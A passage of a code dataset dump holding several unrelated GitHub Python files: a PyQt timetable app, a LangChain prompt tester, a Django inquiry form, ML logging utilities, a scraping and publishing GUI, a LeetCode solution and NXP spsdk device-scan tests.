self.target_choice_button.clicked.connect(self.selectTarget)\n self.genCalButton.clicked.connect(self.generateCalendars)\n self.dateFileButton.clicked.connect(self.selectDateFile)\n self.quitButton.clicked.connect(self.close)\n self.first_run = True\n\n def updateDates(self, index=0):\n if index < 3:\n self.date_edit_list[index + 1].setMinimumDate(self.date_edit_list[index].date())\n\n def lambdaGen(self, i):\n return lambda: self.updateDates(i)\n\n def selectXMLFile(self):\n self.xml_line_edit.setText(QtWidgets.QFileDialog.getOpenFileName())\n\n def selectTarget(self):\n self.target_line_edit.setText(QtWidgets.QFileDialog.getExistingDirectory())\n\n def selectDateFile(self):\n self.selectDates(QtWidgets.QFileDialog.getOpenFileName())\n\n def selectDates(self, filename):\n if filename and filename[0]:\n config = configparser.ConfigParser()\n config.read(filename)\n choices = config.sections()\n term, ok = QtWidgets.QInputDialog.getItem(self, \"Select Term\", \"Select term: \", choices, 0, False)\n if ok:\n term_choice = config[term]\n self.term_start_edit.setDate(QtCore.QDate.fromString(term_choice[\"term_start\"], \"dd'/'MM'/'yyyy\"))\n self.half_end_edit.setDate(QtCore.QDate.fromString(term_choice[\"half_end\"], \"dd'/'MM'/'yyyy\"))\n self.half_start_edit.setDate(QtCore.QDate.fromString(term_choice[\"half_start\"], \"dd'/'MM'/'yyyy\"))\n self.term_end_edit.setDate(QtCore.QDate.fromString(term_choice[\"term_end\"], \"dd'/'MM'/'yyyy\"))\n\n def generateCalendars(self):\n target = self.target_line_edit.text()\n xml_file = self.xml_line_edit.text()\n term_start = datetime.datetime.combine(self.term_start_edit.date().toPyDate(), datetime.time())\n half_end = datetime.datetime.combine(self.half_end_edit.date().toPyDate(), datetime.time())\n half_start = datetime.datetime.combine(self.half_start_edit.date().toPyDate(), datetime.time())\n term_end = datetime.datetime.combine(self.term_end_edit.date().toPyDate(), datetime.time())\n print(xml_file)\n if not(os.path.isfile(xml_file)):\n self.workLabel.setText(\"XML file not found\")\n elif not(os.path.isdir(target)):\n self.workLabel.setText(\"Target directory not found\")\n else:\n self.workLabel.setText('Working...')\n if self.week_b.isChecked():\n week_start = \"B\"\n else:\n week_start = \"A\"\n dates = tp.timetableDates(term_start=term_start, half_end=half_end, half_start=half_start, term_end=term_end, week_start=week_start)\n calGroup = tp.TimeTableGroup(xml_file, dates)\n if not(self.first_run) and self.calThread.running:\n pass\n else:\n self.first_run = False\n self.calThread = calendarThread(calGroup, target, parent=self)\n self.calThread.start()\n\n\nclass calendarThread(threading.Thread):\n def __init__(self, calendarGroup, target, parent=None):\n threading.Thread.__init__(self)\n self.calendarGroup = calendarGroup\n self.target = target\n self.parent = parent\n self.running = True\n\n def run(self):\n try:\n self.calendarGroup.generate_calendars(self.target)\n self.parent.workLabel.setText('Done')\n self.running = False\n except:\n self.parent.workLabel.setText('Error')\n self.running = False\n\nclass QStyledCalendar(QtWidgets.QCalendarWidget):\n def __init__(self, parent=None):\n super(QStyledCalendar, self).__init__(parent)\n\n def setDayColor(self, day, color):\n if type(color) != QtGui.QColor:\n color = QtGui.QColor(color)\n form = self.weekdayTextFormat(day)\n form.setForeground(color)\n self.setWeekdayTextFormat(day, form)\n\n def setDirectionIcons(self, left_icon, right_icon):\n left_button = self.children()[3].children()[0]\n right_button = self.children()[3].children()[1]\n if type(left_icon) != QtGui.QIcon:\n left_icon = QtGui.QIcon(left_icon)\n if type(right_icon) != QtGui.QIcon:\n right_icon = QtGui.QIcon(right_icon)\n left_button.setIcon(left_icon)\n right_button.setIcon(right_icon)\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n app.setStyleSheet(style)\n form = TimetableApp()\n form.show()\n app.exec_()\n","repo_name":"Giannie/Timetable-Parser","sub_path":"timetable_universal.py","file_name":"timetable_universal.py","file_ext":"py","file_size_in_byte":6292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72121451046","text":"import re\nimport os\nfrom langchain.llms import OpenAI, GPT4All\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.chains import LLMChain\nfrom langchain.prompts import PromptTemplate\nfrom langchain.prompts.chat import (\n HumanMessagePromptTemplate,\n ChatPromptTemplate\n)\nimport yaml\n\n\nCHAT_MODELS=[\"gpt-4\", \"gpt-4-0314\", \"gpt-4-32k\", \"gpt-4-32k-0314\", \"gpt-3.5-turbo\", \"gpt-3.5-turbo-0301\"]\nCOMPLETION_MODELS=[\"text-davinci-003\", \"text-davinci-002\", \"text-curie-001\", \"text-babbage-001\", \"text-ada-001\"]\n\ndef _extract_default_output(o):\n return o.strip()\n\ndef _extract_gpt4all_output(output_str):\n answer = \"Answer:\"\n index = output_str.find(answer)\n if index != -1:\n return output_str[index + len(answer):].strip()\n else:\n return \"\"\n\ndef _create_llm_chain(model_name, template, input_variables, temperature, max_tokens):\n extractor = _extract_default_output\n if model_name in CHAT_MODELS:\n llm = ChatOpenAI(model_name=model_name, temperature=temperature, max_tokens=max_tokens)\n prompt_template = ChatPromptTemplate.from_messages([HumanMessagePromptTemplate.from_template(template=template)])\n elif model_name in COMPLETION_MODELS:\n llm = OpenAI(model_name=model_name, temperature=temperature, max_tokens=max_tokens)\n prompt_template = PromptTemplate(template=template, input_variables=input_variables)\n elif os.path.isabs(model_name) or model_name.startswith('./') or model_name.startswith('../'):\n llm = GPT4All(model=model_name, temp=temperature, n_predict=max_tokens)\n # we wrap the original template in a request/response format so\n # - there's a better chance gpt4all does the right thing\n # - we can parse the output after response\n input_template=f'Question: {template}\\nAnswer:'\n prompt_template = PromptTemplate(template=input_template, input_variables=input_variables)\n # we need to remove the question/answer template\n extractor = _extract_gpt4all_output\n else:\n raise ValueError(f\"Invalid model_name: {model_name}. Please use a valid OpenAI model or provide a relative/absolute path for a GPT4All model.\")\n\n return LLMChain(llm=llm, prompt=prompt_template), extractor\n\ndef _compare_output(output, expected_output):\n if expected_output['type'] == 'regex':\n pattern = re.compile(expected_output['value'])\n return pattern.match(output) is not None, None\n elif expected_output['type'] == 'string':\n return output == expected_output['value'], None\n elif expected_output['type'] == 'yaml':\n try:\n output_yaml = yaml.safe_load(output)\n expected_yaml = yaml.safe_load(expected_output['value'])\n return output_yaml == expected_yaml, None\n except yaml.YAMLError:\n return False\n elif expected_output['type'] == 'prompt':\n model = expected_output['model']\n llm = OpenAI(model_name=model, temperature=0, max_tokens=1800)\n out_value = expected_output['value']\n\n params = { 'input_text': output, 'conditions': out_value['conditions'] }\n current_file_path = os.path.abspath(__file__)\n current_dir_path = os.path.dirname(current_file_path)\n\n with open(os.path.join(current_dir_path, 'templates/conditions_on_text.yml'), 'r') as file:\n template = file.read()\n\n if model in CHAT_MODELS:\n llm = ChatOpenAI(model_name=model, temperature=0, max_tokens=1800)\n prompt_template = ChatPromptTemplate.from_messages([HumanMessagePromptTemplate.from_template(template=template)])\n else:\n llm = OpenAI(model_name=model, temperature=0, max_tokens=1800)\n prompt_template = PromptTemplate(template=template, input_variables=['input_text', 'conditions'])\n\n llm_chain, extractor = LLMChain(llm=llm, prompt=prompt_template, output_key='validation_result')\n\n validation_result = llm_chain.predict(**params)\n\n try:\n validation_result_yaml = yaml.safe_load(validation_result)\n overall_pass = validation_result_yaml.get('pass', False)\n return overall_pass, validation_result_yaml\n except yaml.YAMLError:\n return False\n else:\n return False\n\ndef test_models(prompt_data, tests_data):\n template = prompt_data['template']\n input_variables = prompt_data['input_variables']\n\n tests = tests_data['tests']\n model_names = tests_data['model_names']\n temperature = tests_data['temperature']\n max_tokens = tests_data['max_tokens']\n\n results = {}\n\n for model_name in model_names:\n total = 0\n passes = 0\n model_results = []\n\n llm_chain, extractor = _create_llm_chain(model_name, template, input_variables, temperature, max_tokens)\n\n for item in tests:\n variables = item['variables']\n expected_output = item['expected_output']\n\n result = extractor(llm_chain.predict(**variables))\n\n comparison_result, extra_data = _compare_output(result, expected_output)\n\n if comparison_result:\n passes += 1\n\n test_result = {\n 'inputs': variables,\n 'output': result,\n 'comparison_result': comparison_result,\n 'extra_data': extra_data\n }\n model_results.append(test_result)\n\n total += 1\n\n results[model_name] = (model_results, passes, total)\n\n return results\n","repo_name":"dschenkelman/promptest","sub_path":"promptest/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"52"} +{"seq_id":"4844882367","text":"from django.core.mail import EmailMessage\nfrom django import forms\n\n\nclass InquiryForm(forms.Form):\n name = forms.CharField(label='お名前', max_length=50)\n email = forms.EmailField(label='メールアドレス')\n title = forms.CharField(label='タイトル', max_length=50)\n message = forms.CharField(label='メッセージ', widget=forms.Textarea)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def send_email(self):\n \"\"\"メール送信処理\"\"\"\n\n # ユーザー入力値の取得\n # self.cleaned_data['<フィールド名>'] とすることで、フォームバリデーションを通ったユーザー入力値を取得できる.\n name = self.cleaned_data['name']\n email = self.cleaned_data['email']\n title = self.cleaned_data['title']\n message = self.cleaned_data['message']\n\n # メール送信情報\n subject = f'お問い合わせ {title}'\n message = (\n '送信者: {}\\n'.format(name) + \n 'メールアドレス: {}\\n'.format(email) + \n 'メッセージ:\\n{}'.format(message)\n )\n from_email = 'yamashi7227.04020105.7227@outlook.jp'\n to_list = ['yamashi7227.04020105.7227@outlook.jp']\n cc_list = [email]\n\n # メール送信(EmailMessageオブジェクトのインスタンス化 -> 送信)\n message = EmailMessage(subject=subject, body=message, from_email=from_email, to=to_list, cc=cc_list)\n message.send()\n","repo_name":"tai72/boatrace_app","sub_path":"daily_result/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37865458022","text":"from builtins import print\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport random\n\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nmatplotlib.rcParams['font.family'] = 'sans-serif'\nmatplotlib.rcParams['font.sans-serif'] = 'Arial'\n\nimport os\nimport operator\nimport utils\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\n\ndef save_logs(output_directory, hist, y_pred, y_true, duration,\n lr=True, plot_test_acc=True):\n hist_df = pd.DataFrame(hist.history)\n hist_df.to_csv(output_directory + 'history.csv', index=False)\n\n df_metrics = calculate_metrics(y_true, y_pred, duration)\n df_metrics.to_csv(output_directory + 'df_metrics.csv', index=False)\n\n index_best_model = hist_df['loss'].idxmin()\n row_best_model = hist_df.loc[index_best_model]\n\n df_best_model = pd.DataFrame(data=np.zeros((1, 6), dtype=np.float), index=[0],\n columns=['best_model_train_loss', 'best_model_val_loss', 'best_model_train_acc',\n 'best_model_val_acc', 'best_model_learning_rate', 'best_model_nb_epoch'])\n\n df_best_model['best_model_train_loss'] = row_best_model['loss']\n if plot_test_acc:\n df_best_model['best_model_val_loss'] = row_best_model['val_loss']\n df_best_model['best_model_train_acc'] = row_best_model['acc']\n if plot_test_acc:\n df_best_model['best_model_val_acc'] = row_best_model['val_acc']\n if lr == True:\n df_best_model['best_model_learning_rate'] = row_best_model['lr']\n df_best_model['best_model_nb_epoch'] = index_best_model\n\n df_best_model.to_csv(output_directory + 'df_best_model.csv', index=False)\n\n if plot_test_acc:\n # plot losses\n plot_epochs_metric(hist, output_directory + 'epochs_loss.png')\n\n return df_metrics\n\ndef calculate_metrics(y_true, y_pred, duration):\n res = pd.DataFrame(data=np.zeros((1, 4), dtype=np.float), index=[0],\n columns=['precision', 'accuracy', 'recall', 'duration'])\n res['precision'] = precision_score(y_true, y_pred, average='macro')\n res['accuracy'] = accuracy_score(y_true, y_pred)\n res['recall'] = recall_score(y_true, y_pred, average='macro')\n res['duration'] = duration\n return res\n\ndef save_test_duration(file_name, test_duration):\n res = pd.DataFrame(data=np.zeros((1, 1), dtype=np.float), index=[0],\n columns=['test_duration'])\n res['test_duration'] = test_duration\n res.to_csv(file_name, index=False)\n\ndef plot_epochs_metric(hist, file_name, metric='loss'):\n plt.figure()\n plt.plot(hist.history[metric])\n plt.plot(hist.history['val_' + metric])\n plt.title('model ' + metric)\n plt.ylabel(metric, fontsize='large')\n plt.xlabel('epoch', fontsize='large')\n plt.legend(['train', 'val'], loc='upper left')\n plt.savefig(file_name, bbox_inches='tight')\n plt.close()\n\n\n archive_name = ARCHIVE_NAMES[0]\n dataset_name = 'InlineSkate'\n datasets_dict = read_dataset(root_dir, archive_name, dataset_name)\n\n lengths = [2 ** i for i in range(5, 12)]\n\n x_train = datasets_dict[dataset_name][0]\n y_train = datasets_dict[dataset_name][1]\n x_test = datasets_dict[dataset_name][2]\n y_test = datasets_dict[dataset_name][3]\n\n new_archive_name = 'InlineSkateXPs'\n\n for l in lengths:\n new_x_train = resample_dataset(x_train, l)\n new_x_test = resample_dataset(x_test, l)\n new_dataset_name = dataset_name + '-' + str(l)\n new_dataset_dir = root_dir + 'archives/' + new_archive_name + '/' + new_dataset_name + '/'\n create_directory(new_dataset_dir)\n\n np.save(new_dataset_dir + 'x_train.npy', new_x_train)\n np.save(new_dataset_dir + 'y_train.npy', y_train)\n np.save(new_dataset_dir + 'x_test.npy', new_x_test)\n np.save(new_dataset_dir + 'y_test.npy', y_test)","repo_name":"epodium/EEG_age_prediction","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"37539478443","text":"import sys\nfrom PyQt6.QtWidgets import *\nfrom PyQt6.QtCore import pyqtSignal,QThread\nfrom PyQt6 import uic\nfrom DataHandler.dm3DataHandler import dm3DataHandler \n\nfrom AIWorking.zhihuAuto import zhihuPublish\n\n# import os\nimport path\nsrc_folder = path.Path(__file__).abspath()\nsys.path.append(src_folder.parent.parent)\nfrom server.dm3service import dm3service\nfrom datacreep.dm3Creep import creep3dm\n\nfrom UI.imgDialog import imgDialog\nimport datetime\n\n\nclass mainWin(QMainWindow):\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n uic.loadUi(\"UI/UI_main.ui\", self) \n self.bn_run.clicked.connect(self.event_bn_creep)\n self.bn_dialog.clicked.connect(self.event_bn_dialog)\n self.bn_publish.clicked.connect(self.event_publish)\n self.bn_selectAll.clicked.connect(self.event_bn_selecteAll)\n\n # b = QPushButton()\n self.bn_publish.setDisabled(True)\n\n # l= QLineEdit()\n deftext = \"大嘴吹-{0}\".format(datetime.datetime.now().strftime(\"%Y%m%d\"))\n self.txt_title.setText(deftext)\n\n self.dm3Service = dm3service()\n self.dm3Handler = dm3DataHandler(self.tPicInfo)\n self.imgDialog = imgDialog()\n\n #全选\n def event_bn_selecteAll(self):\n self.dm3Handler.selectAllRow()\n\n\n #发布\n def event_publish(self):\n \n pd = self.dm3Handler.getPublishData(self.rb_isRandom.isChecked())\n \n pd.title = self.txt_title.text()\n for data in pd.list:\n print(\"titleName:{0},imgUrl:{1}\".format(data.titleName,data.picUrl)) \n \n # 到知乎\n zhihuPublish(pd)\n pass\n \n #抓爬数据\n def event_bn_creep(self):\n\n self.tPicInfo.clearContents()\n url = self.cb_url.currentText()\n\n if(str.strip(url) == \"\"):\n QMessageBox.warning(self,\"Stop\",\"没有设置Url\")\n return\n \n # 获取到URL,开始抓爬数据\n creep = creep3dm()\n creep.setWin(self)\n creep.start(url,1,2)\n\n # 获取到抓爬数据\n # 加载到内存,并展示\n self.dm3Handler.loadData(creep.data)\n try:\n # print(\"dataList Count:\",len(self.dm3Handler.data))\n self.tm = threadMonitor(self.dm3Handler)\n self.tm.signalworker.connect(self.tm_connect)\n self.tm.start() \n except Exception as e:\n print(\"Thread Error:\",repr(e))\n\n def tm_connect(self):\n # self.bn_publish.setDisabled(False)\n self.event_publish()\n\n\n def event_bn_dialog(self): \n self.imgDialog.setMinimumSize(600,500)\n self.imgDialog.exec()\n pass\n\n def showMessageFromOut(self,msg):\n QMessageBox.information(self,\"Info\",msg)\n\n \nclass threadMonitor(QThread):\n\n signalworker = pyqtSignal()\n\n def __init__(self,handler:dm3DataHandler) -> None:\n super().__init__()\n \n self.handler = handler\n\n def run(self):\n runStatus= 0\n while(runStatus == 0):\n # print(\"Thread Monitor dataList Count:\",len(self.handler.data))\n # print(\"Thread downNum:\",self.handler.imgDownNum)\n if(self.handler.imgDownNum == len(self.handler.data)):\n runStatus = 1 # 全部下载完毕到\n break\n QThread.sleep(2)\n\n if(runStatus == 1):\n self.signalworker.emit()\n \n self.quit()\n\n\n\nif __name__ == '__main__':\n # # 创建一个app,应用\n app = QApplication(sys.argv)\n w = mainWin()\n w.show()\n sys.exit(app.exec())\n","repo_name":"flysnoopy1984/autoPortage","sub_path":"UI/mainWin.py","file_name":"mainWin.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21904749294","text":"import platform\nfrom unittest.mock import MagicMock, patch\n\nimport libusbsio\nimport pytest\nfrom serial import Serial\nfrom serial.tools.list_ports_common import ListPortInfo\n\nimport spsdk.utils.devicedescription as devicedescription\nimport spsdk.utils.nxpdevscan as nds\nfrom spsdk.exceptions import SPSDKError\nfrom spsdk.mboot.exceptions import McuBootConnectionError\n\n\ndef test_usb_device_search():\n \"\"\"Test, that search method returns all NXP devices based on their VID.\n Default VID's so far are 0x1fc9, 0x15a2.\n \"\"\"\n test_vector = [\n {\n \"vendor_id\": 0x0001,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x15,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x1FC9,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x15A2,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n ]\n result = [\n devicedescription.USBDeviceDescription(0x1FC9, 0, \"\", \"\", \"\", \"\", \"\"),\n devicedescription.USBDeviceDescription(0x15A2, 0, \"\", \"\", \"\", \"\", \"\"),\n ]\n\n with patch(\"libusbsio.LIBUSBSIO.HIDAPI_Enumerate\", MagicMock(return_value=test_vector)):\n devices = nds.search_nxp_usb_devices()\n\n assert len(devices) == len(result)\n\n for dev, res in zip(devices, result):\n assert str(dev) == str(res)\n\n\ndef test_usb_device_search_extended():\n \"\"\"Verify search method returns all NXP devices based on their VID + all\n additional devices.\n Default VID's so far are 0x1fc9, 0x15a2\n \"\"\"\n test_vector = [\n {\n \"vendor_id\": 0x1FC9,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x0001,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x15,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x1FC9,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x0002,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x15A2,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n ]\n result = [\n devicedescription.USBDeviceDescription(0x1FC9, 0, \"\", \"\", \"\", \"\", \"\"),\n devicedescription.USBDeviceDescription(0x1FC9, 0, \"\", \"\", \"\", \"\", \"\"),\n devicedescription.USBDeviceDescription(0x0002, 0, \"\", \"\", \"\", \"\", \"\"),\n devicedescription.USBDeviceDescription(0x15A2, 0, \"\", \"\", \"\", \"\", \"\"),\n ]\n with patch(\"libusbsio.LIBUSBSIO.HIDAPI_Enumerate\", MagicMock(return_value=test_vector)):\n devices = nds.search_nxp_usb_devices([0x2])\n\n assert len(devices) == len(result)\n\n for dev, res in zip(devices, result):\n assert str(dev) == str(res)\n\n\n# following mock functions are only for `test_uart_device_search usage`\n\n\ndef mock_mb_scan_uart(port, timeout: int = 0):\n return True if port == \"COM1\" else False\n\n\ndef mock_sdp_read_status(self, *args, **kwargs):\n print(\"inside mock_sdp_read_status\")\n retval = 1 if self._interface.device._device.port == \"COM5\" else None\n return retval\n\n\ndef mock_sdp_uart_init(self, port: str = None, timeout: int = 5000, baudrate: int = 115200):\n self._device = Serial(port=None, timeout=timeout / 1000, baudrate=baudrate)\n self._device.port = port\n self.expect_status = True\n\n\nlist_port_info_mock = [\n ListPortInfo(device=\"COM1\"),\n ListPortInfo(device=\"COM5\"),\n ListPortInfo(device=\"COM28\"),\n]\n\n\n@patch(\"spsdk.utils.nxpdevscan.MbootUARTInterface.scan\", mock_mb_scan_uart)\n@patch(\"spsdk.utils.nxpdevscan.SDP.read_status\", mock_sdp_read_status)\n@patch(\"spsdk.utils.interfaces.device.serial_device.SerialDevice.__init__\", mock_sdp_uart_init)\n@patch(\"spsdk.utils.nxpdevscan.comports\", MagicMock(return_value=list_port_info_mock))\ndef test_uart_device_search():\n \"\"\"Test, that search method returns all NXP Uart devices.\"\"\"\n\n result = [\n devicedescription.UartDeviceDescription(name=\"COM1\", dev_type=\"mboot device\"),\n devicedescription.UartDeviceDescription(name=\"COM5\", dev_type=\"SDP device\"),\n ]\n\n devices = nds.search_nxp_uart_devices()\n\n assert len(devices) == len(result)\n\n for dev, res in zip(devices, result):\n assert str(dev) == str(res)\n\n\n# following mock functions are only for `test_sdio_device_search usage`\nclass mockSdio:\n def __init__(self, path: str = None) -> None:\n \"\"\"Initialize the SDIO interface object.\n\n :raises McuBootConnectionError: when the path is empty\n \"\"\"\n super().__init__()\n\n class SdioDevice:\n def __init__(self, _path) -> None:\n self._opened = False\n # Temporarily use hard code until there is a way to retrive VID/PID\n self.vid = 0x0471\n self.pid = 0x0209\n self.timeout = 2000\n if path is None:\n raise McuBootConnectionError(\"No SDIO device path\")\n self.path = _path\n self.is_blocking = False\n\n self.device = SdioDevice(path)\n\n\ndef test_sdio_device_search():\n \"\"\"Test, that search method returns all NXP SDIO devices.\"\"\"\n\n test = mockSdio(\"/dev/mcu-sdio\")\n result = [\n devicedescription.SDIODeviceDescription(0x0471, 0x0209, \"/dev/mcu-sdio\"),\n ]\n with patch(\"spsdk.utils.nxpdevscan.MbootSdioInterface.scan\", MagicMock(return_value=[test])):\n devices = nds.search_nxp_sdio_devices()\n\n assert len(devices) == len(result)\n\n for dev, res in zip(devices, result):\n assert str(dev) == str(res)\n\n\ndef test_sdio_device_search_no_device_found():\n \"\"\"Test, that search method returns all NXP SDIO devices.\"\"\"\n\n result = [\n devicedescription.SDIODeviceDescription(0x0471, 0x0209, \"\"),\n ]\n with patch(\"spsdk.utils.nxpdevscan.MbootSdioInterface.scan\", MagicMock(return_value=[])):\n devices = nds.search_nxp_sdio_devices()\n assert len(devices) != len(result)\n\n\n@pytest.mark.parametrize(\n \"vid, pid, expected_result\",\n [\n (0x1111, 0x2222, []),\n (0x15A2, 0x0073, [\"MKL27\", \"MXRT20\", \"MXRT50\", \"MXRT60\"]),\n (0x1FC9, 0x0135, [\"IMXRT\", \"MXRT60\"]),\n ],\n)\ndef test_get_device_name(vid, pid, expected_result):\n \"\"\"Verify search works and returns appropriate name based on VID/PID\"\"\"\n assert devicedescription.get_usb_device_name(vid, pid) == expected_result\n\n\ndef test_path_conversion():\n \"\"\"Verify, that path gets converted properly.\"\"\"\n with patch(\"platform.system\", MagicMock(return_value=\"Windows\")):\n win_path = (\n b\"\\\\\\\\?\\\\hid#vid_1fc9&pid_0130#6&1625c75b&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\"\n )\n assert (\n devicedescription.convert_usb_path(win_path)\n == \"HID\\\\VID_1FC9&PID_0130\\\\6&1625C75B&0&0000\"\n )\n\n with patch(\"platform.system\", MagicMock(return_value=\"Linux\")):\n linux_path = b\"000A:000B:00\"\n\n assert devicedescription.convert_usb_path(linux_path) == \"10#11\"\n\n with patch(\"platform.system\", MagicMock(return_value=\"Darwin\")):\n mac_path = b\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/XHC1@14/XHC1@14000000/HS02@14200000/SE Blank RT Family @14200000\"\n\n assert (\n devicedescription.convert_usb_path(mac_path)\n == \"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/XHC1@14/XHC1@14000000/HS02@14200000/SE Blank RT Family @14200000\"\n )\n\n\nPATH_BY_SYSTEM = {\n \"win\": (b\"some_path\", \"SOME_PATH\", \"0a595daf\"),\n \"linux\": (b\"000A:000B:00\", \"10#11\", \"6359be0f\"),\n \"darwin\": (\n b\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/XHC1@14/XHC1@14000000/HS02@14200000/SE Blank RT Family @14200000\",\n \"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/XHC1@14/XHC1@14000000/HS02@14200000/SE Blank RT Family @14200000\",\n \"cafe5e92\",\n ),\n}\n\n\ndef mock_libusbsio_GetDeviceInfo(self, dev: int):\n \"\"\"MagicMock override function to return information.\"\"\"\n assert dev == 0\n sio_info = libusbsio.LIBUSBSIO.HIDAPI_DEVICE_INFO_T()\n sio_info.vendor_id = 10\n sio_info.product_id = 20\n sio_info.product_string = \"my product\"\n sio_info.manufacturer_string = \"manufacturer X\"\n sio_info.serial_number = \"sio device\"\n sio_info.interface_number = 5\n sio_info.release_number = 125\n\n system = platform.system()\n if system == \"Windows\":\n sio_info.path = PATH_BY_SYSTEM[\"win\"][0]\n if system == \"Linux\":\n sio_info.path = PATH_BY_SYSTEM[\"linux\"][0]\n if system == \"Darwin\":\n sio_info.path = PATH_BY_SYSTEM[\"darwin\"][0]\n\n return sio_info\n\n\n@patch(\"libusbsio.LIBUSBSIO.GetNumPorts\", MagicMock(return_value=1))\n@patch(\"libusbsio.LIBUSBSIO.GetDeviceInfo\", mock_libusbsio_GetDeviceInfo)\ndef test_sio_device_search():\n \"\"\"Test, that search method returns all NXP SIO devices.\"\"\"\n\n def get_return(path):\n return (\n \"LIBUSBSIO - manufacturer X, my product\\n\"\n \"Vendor ID: 0x000a\\n\"\n \"Product ID: 0x0014\\n\"\n f\"Path: {path[1]}\\n\"\n f\"Path Hash: {path[2]}\\n\"\n \"Serial number: sio device\\n\"\n \"Interface number: 5\\n\"\n \"Release number: 125\"\n )\n\n if platform.system() != \"Darwin\":\n # Windows and Linux libraries cannot be loaded on Mac with Apple Sillicon\n with patch(\"platform.system\", MagicMock(return_value=\"Windows\")):\n devices = nds.search_libusbsio_devices()\n assert len(devices) == 1\n assert str(devices[0]) == get_return(PATH_BY_SYSTEM[\"win\"])\n\n with patch(\"platform.system\", MagicMock(return_value=\"Linux\")):\n devices = nds.search_libusbsio_devices()\n assert len(devices) == 1\n assert str(devices[0]) == get_return(PATH_BY_SYSTEM[\"linux\"])\n\n with patch(\"platform.system\", MagicMock(return_value=\"Darwin\")):\n devices = nds.search_libusbsio_devices()\n assert len(devices) == 1\n assert str(devices[0]) == get_return(PATH_BY_SYSTEM[\"darwin\"])\n\n\ndef mock_libusbsio_GetNumPorts(self, vidpids=None):\n \"\"\"Try to get number of ports from LIBUSBSIO, but it fails.\"\"\"\n raise libusbsio.LIBUSBSIO_Exception(\"Test Fail\")\n\n\n@patch(\"libusbsio.LIBUSBSIO.GetNumPorts\", mock_libusbsio_GetNumPorts)\ndef test_sio_device_search_fail():\n \"\"\"Test, that search method returns all NXP SIO devices and its fails.\"\"\"\n with pytest.raises(SPSDKError):\n nds.search_libusbsio_devices()\n","repo_name":"nxp-mcuxpresso/spsdk","sub_path":"tests/utils/test_nxpdevscan.py","file_name":"test_nxpdevscan.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"52"} +{"seq_id":"22613919470","text":"class Solution:\n def sortPeople(self, names: List[str], heights: List[int]) -> List[str]:\n mapping = {}\n for i in range(len(names)):\n mapping[heights[i]] = names[i]\n\n # Sort dictionary\n # mapping = sorted(mapping.items(), reverse=True)\n # res = []\n # for _, people in mapping:\n # res.append(people)\n # return res\n\n # Another approach\n heights = sorted(heights, reverse=True)\n res = []\n for height in heights:\n res.append(mapping.get(height))\n return res\n ","repo_name":"abdifatahmohamad/Coding-Interview-Solutions","sub_path":"leetcode_solutions/2418-sort-the-people/2418-sort-the-people.py","file_name":"2418-sort-the-people.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33640557470","text":"#!/usr/bin/env python\nimport re\nimport pytest\nfrom pathlib import Path\nimport logging\nimport datetime\nfrom collections import namedtuple\nfrom functools import partial\nfrom enum import Enum\nfrom deepdiff import DeepHash\nfrom deepdiff.deephash import (\n prepare_string_for_hashing, unprocessed,\n UNPROCESSED_KEY, BoolObj, HASH_LOOKUP_ERR_MSG, combine_hashes_lists)\nfrom deepdiff.helper import pypy3, get_id, number_to_string, np, 